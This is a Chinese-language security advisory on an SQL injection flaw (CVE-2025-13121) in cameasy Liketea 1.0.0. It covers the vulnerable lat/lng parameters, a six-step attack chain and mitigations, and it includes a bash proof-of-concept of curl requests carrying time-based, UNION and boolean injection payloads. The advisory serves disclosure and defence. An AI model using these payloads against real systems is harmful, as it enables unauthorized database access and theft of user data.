CVE-2025-13121 cameasy Liketea 1.0.0 SQL注入漏洞

漏洞信息

漏洞编号

CVE-2025-13121

漏洞类型

SQL注入

CVSS评分

7.3 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

cameasy Liketea 1.0.0

漏洞概述

CVE-2025-13121是位于cameasy Liketea 1.0.0版本中的一个高危安全漏洞。该漏洞存在于Laravel框架构建的应用程序中，具体位于laravel/app/Http/Controllers/Front/StoreController.php文件的API Endpoint组件。漏洞源于对用户输入参数lng（经度）和lat（纬度）缺乏充分的输入验证和过滤，攻击者可以通过构造恶意的SQL语句片段注入到后端数据库查询中。由于该漏洞可通过网络远程利用，且无需任何认证和用户交互，因此具有极高的实际威胁性。CVSS 3.1评分7.3分（高危），对系统的机密性、完整性和可用性均造成较低程度的影响。漏洞利用代码已被公开披露，可能已被恶意利用于数据窃取或数据库破坏。

技术细节

该SQL注入漏洞位于StoreController.php的API端点处理逻辑中。当应用程序处理包含lng和lat参数的请求时，直接将用户可控的输入拼接到SQL查询语句中而未进行参数化查询或充分的输入验证。攻击者可以通过在lng或lat参数中注入SQL关键字和语句，如使用UNION SELECT、布尔盲注或时间盲注等技术，绕过应用程序的正常逻辑，执行未授权的数据库操作。由于Laravel框架默认使用PDO的预处理语句，正确实现时应使用参数绑定，但该漏洞代码可能直接使用了原始SQL拼接或存在参数绑定实现缺陷。攻击者利用此漏洞可以枚举数据库结构、提取敏感用户数据、修改数据库内容或在特定条件下执行系统命令。漏洞的利用需要攻击者具备基本的HTTP请求能力，可从互联网任何位置发起攻击。

攻击链分析

STEP 1

步骤1: 信息收集

攻击者识别目标系统使用cameasy Liketea 1.0.0框架，确定存在StoreController.php的API端点

STEP 2

步骤2: 漏洞探测

通过发送包含特殊字符的lng/lat参数请求（如单引号、SQL关键字），观察响应判断是否存在SQL注入漏洞

STEP 3

步骤3: 注入点确认

使用布尔盲注或时间盲注技术确认lng/lat参数存在SQL注入，验证注入点可被利用

STEP 4

步骤4: 数据库枚举

利用UNION注入或盲注技术提取数据库版本、库名、表名等数据库结构信息

STEP 5

步骤5: 敏感数据提取

通过构造恶意的SQL查询语句，提取用户表中的敏感信息如用户名、密码、邮箱等数据

STEP 6

步骤6: 权限提升或持久化

在某些配置下可能通过SQL注入执行系统命令，或写入后门程序实现持久化控制

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/bin/bash
# CVE-2025-13121 SQL Injection PoC for cameasy Liketea 1.0.0
# Target: StoreController.php API Endpoint

TARGET_URL="http://target.com/api/endpoint"

# SQL Injection using time-based blind injection in lat parameter
echo "[*] Testing CVE-2025-13121 SQL Injection..."

# Basic injection test - check for SQL error response
curl -s -X GET "${TARGET_URL}?lat=1' AND SLEEP(5)--" \
  -H "Content-Type: application/json" \
  -w "\nResponse Time: %{time_total}s\n"

# UNION-based injection to extract database version
echo "[*] Extracting database version..."
curl -s -X GET "${TARGET_URL}?lat=1' UNION SELECT NULL,@@version,NULL--" \
  -H "Content-Type: application/json"

# Extract database name
echo "[*] Extracting database name..."
curl -s -X GET "${TARGET_URL}?lat=1' UNION SELECT NULL,database(),NULL--" \
  -H "Content-Type: application/json"

# Boolean-based blind injection for data extraction
echo "[*] Testing boolean-based blind injection..."
curl -s -X GET "${TARGET_URL}?lat=1' AND 1=1--" \
  -H "Content-Type: application/json"

curl -s -X GET "${TARGET_URL}?lat=1' AND 1=2--" \
  -H "Content-Type: application/json"

echo "[*] PoC completed. Check responses for SQL injection indicators."

影响范围

cameasy Liketea 1.0.0

防御指南

临时缓解措施

在官方补丁发布前，可采取以下临时缓解措施：1）通过Web应用防火墙规则暂时阻断包含SQL注入特征的请求；2）对API端点实施临时访问控制，限制来源IP或增加认证要求；3）在代码层面临时禁用受影响的StoreController端点功能；4）加强对数据库账户的权限限制，禁用危险的SQL函数；5）部署实时入侵检测系统监控异常的数据库查询行为。建议尽快应用官方安全更新以彻底修复该漏洞。